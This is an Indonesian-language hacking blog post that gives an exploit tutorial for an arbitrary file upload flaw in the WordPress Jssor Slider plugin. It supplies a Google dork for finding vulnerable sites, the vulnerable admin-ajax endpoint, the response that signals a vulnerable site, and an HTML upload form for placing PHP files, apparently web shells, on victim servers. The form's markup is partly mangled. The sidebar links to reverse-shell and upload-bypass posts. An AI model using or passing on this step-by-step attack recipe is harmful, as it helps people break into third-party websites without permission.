Wordpress Jssor-Slider CSRF Arbitary File Upload

Jssor Slider adalah tayangan slide / slider / galeri / korsel / spanduk, itu dioptimalkan untuk perangkat seluler dengan banyak fitur unik.

Google Dork : inurl:''/wp-content/jssor-slider/jssor-uploads/''
Exploit : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
Vulnerbility Error : Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
File Path : /wp-content /jssor-slider/jssor-uploads/yourfile.php

Tutorial :

Pertama, copy dork di atas dan paste di browser kalian, lalu cari web yang menurut kalian vuln Jika di masukkan exploit muncul vulnerbility error seperti di atas Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}

Lalu buka CSRF nya atau Disini

<html>
<body>
<form action = "http: // [PATH] /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method = "POST" enctype = "multipart / form-data">
<input type = "file" name = "file" />
<input type = "kirim" value = "Kirim" />
</form>
</body>
</ html

Blank atau muncul Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"} Vuln

Eat, Sleep, Coding. Repeat !

AOICYBER

Search Suggest

Wordpress Jssor-Slider CSRF Arbitary File Upload

Post a Comment

BackConnect Reverse Shell Menggunakan weevely

Install Deb-Multimedia Repositories on Debian and Kali Linux

Python Instagram DeepFake Bot

Beberapa Teknik Bypass File Upload Vulnerability

CTFR - Mencari Subdomain Dalam Beberapa Detik

AOICYBER